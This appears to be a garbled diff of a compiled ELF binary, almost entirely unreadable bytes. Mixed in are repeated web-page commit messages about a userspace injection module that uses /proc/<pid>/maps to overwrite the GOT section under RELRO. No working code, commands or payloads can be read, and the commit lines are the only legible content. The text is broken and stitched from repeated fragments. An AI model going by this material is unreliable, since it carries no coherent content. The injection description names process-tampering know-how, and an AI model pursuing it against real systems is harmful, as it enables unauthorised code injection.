+								<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>!F<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>^#c<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>j9<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>G<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>4<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>M<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>\<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>w<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>#<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>_<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>^<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:^A<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>l`s<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>b<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>o<00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(!<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>9<00>C<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>`<00>"<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>#<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>$<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00> <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)<00>1%<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?<00>I%<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>l<00>t&<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>>"<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Z#<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>t<00>{<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>$<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>$<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>0$5<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>aEk<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>|*<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>U	Xc	d}	<00><00>	<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>	<00><00>	<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>	<00>
 								<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><
 								<00>A
 								+<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>L
 								<00>Q
 								,<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[
 								<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>e
 								<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>j
 								-<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>z
 								<00>
 								,<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 								.<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 								/<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 								<00><00>
 								<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 								<00><00>
 <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 								<00><00>
 								,<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 								<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 								(<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
 <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>7,<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>L,<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>$<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>8<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?dD<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>N<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>*}92<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>}<00>2<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>+<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><00>,<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
3<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<00>
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/

<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-												Adapted memory analysis to larger memory addresses inside the virtual address space. Solved bugs and others, adapting code for RELRO.

											
										
										
											2022-04-04 17:07:45 -04:00
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
+								<00>
 								<00>
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								<00>)
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
+								.
 <
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								<00>C
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
+L
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								GS
 								<00>Z
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
+								<00>_
 								Dm
 								r
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								I<00>
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
+								<00><00>
 								|<00>
 								<00><00>
 								<00>
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								i<00>
 								<00><00>
 								<00><00>
 								<00><00>
 								i<00>
 								D<00>
 								<00>
 								<00>
 								%
 								U2
 								s?
 								{L
 								rY
 								<00>f
 								Vs
 								u<00>
 								<00><00>
 								<00><00>
 								<00><00>
 								<00><00>
 								<00>
 								M<00>
 								<00><00>
 								<00><00>
 								<00><00>
 								<00>
 								:
 								<00>
 								<00>)
 								<00>6
 								<00>C
 								"P
 								M]
 								<00>j
 								<00>w
 								<00><00>
 								<00><00>
 								<00><00>
 								<00>
 								]<00>
 								<00><00>
 								N<00>
 								<00><00>
 								<00>$
 								b1
 A
 								cX
 								<00>e
 								)r
 								&
 								<00><00>
 								<00><00>
 <00>
 								<00>
 								Z<00>
 								<00><00>
 								<00><00>
 								<00><00>
 								G<00>
 								<00>
 								m
 
 
 								<00>E
 								<00>Q
 								<00>]
 								<00>k
 								Ap
 								<00>|
 								<00><00>
 								F<00>
 								<00><00>
 								b<00>
 								<00>
 								<00><00>
 								#<00>
 								,<00>
 								<00>
 								b9
 								iS
 `
 								<00>m
 								<00>z
 								<00>
 								<00>
 								(<00>
 								<00><00>
 								+<00>
 								<00><00>
 								<00>
 								<00><00>
 								<00><00>
 								<00>
 								<00>
 								<00>/
 <
 								<00>V
 								Rc
 								<00>s
 								.<00>
 								<00>
 								<00>
 								<00>
 								<00>/
 								Q
 								[W
 								^
 								jk
 									x
 								<00><00>
 								{<00>
 								]<00>
 								<00><00>
 								j<00>
 								<00><00><00><00>
 								<00>
 								v
 								<00>'
 ^<00>s
 								&<00><00>	<00><00>
 								<00>=
 								<00>!	<00>8
 								H
 								vg
 								<00>w
 								<00>
 								?<00>
 								<00><00>
 								l<00>
 								<00>
 								<00><00>
 								<00><00>	<00>
 								<00>+
 								<00>;
 								{Y
 								<00>z
 								<00>
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								<00><00>
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								<00><00>
 								<00><00>
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								<00><00>
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								T<00>
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								<00>
-												Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

											
										
										
											2022-04-07 07:11:28 -04:00
-												Merged master and develop, now all changes together. Fully tested and working.

											
										
										
											2022-05-15 20:46:35 -04:00
+								s
 '<00>>
 								Z<00>
 								@<00><00>
 								<00><00>
 								z<00>
 								U
 								<00>
 								<00> @<00>`<00><00><00><00><00>.symtab.strtab.shstrtab.rela.text.data.bss.rodata.rela.debug_info.debug_abbrev.rela.debug_aranges.rela.debug_line.debug_str.comment.note.GNU-stack.note.gnu.property.rela.eh_frame @B
@<00>2
&<00>
,<00>
1<00>
<00>>i)9@<00>?J<00>2]<00>0X@<00>P0	q<00>;l@<00>P}0/$<00><00>0<00>*&<00>+<00>+ <00>8+<00><00>@Qx,<00>	<00>0<00><00>Q<00>